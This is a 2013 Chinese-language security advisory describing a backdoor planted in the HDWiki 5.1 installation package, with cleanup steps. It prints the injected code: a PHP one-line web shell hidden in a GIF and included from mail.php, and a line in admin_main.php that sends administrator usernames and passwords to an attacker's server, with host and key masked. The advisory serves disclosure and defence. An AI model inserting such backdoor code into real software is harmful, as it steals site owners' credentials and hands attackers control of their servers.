RSS Feed
更好更安全的互联网

HDWiki 5.1 /style/default/admin/open.gif 后门事件预警

2013-05-09

2013年5月7日,SCANV网站安全中心研究人员发现HDWiki百科建站系统(kaiyuan.hudong.com) “HDWiki5.1 正式版”(包括UTF8和GBK版本)下载安装包文件里被“黑客”人为植入恶意网站木马(后门)代码,该代码在站长用户下载安装HDWiki程序后,可以纪录并发送管理员密码到“黑客“控制的服务器上,并通过该恶意代码,直接控制该站长用户的网站系统,实现“脱库”、“挂马”及“非法SEO”等攻击。我们在第一时间通知HDWiki官方,目前到本文发布为止,官方没有作出任何回应及防御措施。我们强烈建议站长朋友们,在官方清理恶意代码之前,暂停下载安装HDWiki百科建站系统,对已经安装的站长朋友,我们已经紧急推出了诊断工具(http://www.scanv.com/tools/)进行网站体检,确保网站安全。详细分析及解决方案见下:

后门文件分析

经过我们分析,“黑客”在HDWiki安装文件包里,对三个文件进行篡改,来实现“远程执行恶意命令,记录管理员帐号密码”的目的。这3个文件为:

[1] /api/uc_client/control/mail.php
[2] /style/default/admin/open.gif
[3] /control/admin_main.php

1、远程执行恶意命令

通过[1][2]文件篡改来实现“远程执行恶意命令“功能,该功能可以直接导致攻击者控制你网站系统。其中/style/default/admin/open.gif 被植入代码:

<?php @eval($_POST[马赛克])?>

这是“黑客”经常使用到的一句话网站木马代码,恶意代码是放在gif图片内,直接访问无法解析为PHP代码执行,然后“黑客”通过篡改/api/uc_client/control/mail.php文件的第9行代码:

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

包含了这个含有后门代码的图片,这就使图片中的代码得以执行。

2、记录管理员帐号密码

“黑客”通过篡改文件[3]来实现“记录管理员帐号密码”的目的,被植入代码位于/control/admin_main.php文件的第70行,代码如下:

@file_get_contents('http://www.[马赛克].com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

实现把用户提交的username以及password截获等信息并发送到一个被“黑客”远程控制的服务器。

解决方案

第一步:通过SCANV网站安全中心后门检测工具:http://www.scanv.com/tools/ 进行确认是否受该后门影响。效果如图:

第二步:手动清除恶意代码

[1] 将/api/uc_client/control/mail.php 文件里删除第9行代码:    @include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");
[2] 通过复制文件/style/default/open.gif 覆盖 /style/default/admin/open.gif
[3] 将/control/admin_main.php 文件里的删除第70行代码:@file_get_contents('http://www.[马赛克].com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

第三步:再次通过 SCANV网站安全中心后门检测工具:http://www.scanv.com/tools/ 体检确认。
第四步:登陆网站后台,修改管理员密码。

[注:请务必修改管理员密码,另外处于安全考虑,我们把“黑客”使用的代码部分用“马赛克”字样替换了,请修改代码的时候注意一下。]

关于SCANV网站安全中心及知道创宇

“SCANV 网站安全中心“(http://www.scanv.com),由知道创宇安全研究团队驱动,  专注网站安全一体化解决方案,给站长朋友们提供网站漏洞诊断、漏洞预警、被黑预警,并 提供多维度的安全解决方案、专家一对一漏洞修复、一键云端防御等。

"知道创宇" (http://www.knownsec.com) 全称为北京知道创宇信息技术有限公司。是 国内最早提出网站安全云监测及云防御的高新企业,始终致力于为客户提供基于云技术支撑 的下一代 Web 安全解决方案。 知道创宇总部设在北京,在香港、上海、广州、成都设有分公司,客户及合作伙伴来自中国、 美国、日本、韩国等。凭借强大的云安全技术与产品的高可用性、易管理性、合规性和业务 连续性、以及动态保障关键 Web 数据资产安全的能力,帮助用户应对变化多端的互联网安 全威胁,赢得了企业、政府与公共机构的青睐。知道创宇安全实验室在零日安全威胁与云安 全技术方面的研究得到了业内的广泛认同并享有极高知名度。

作者:niubl | Categories:技术分享 | Tags:

发表评论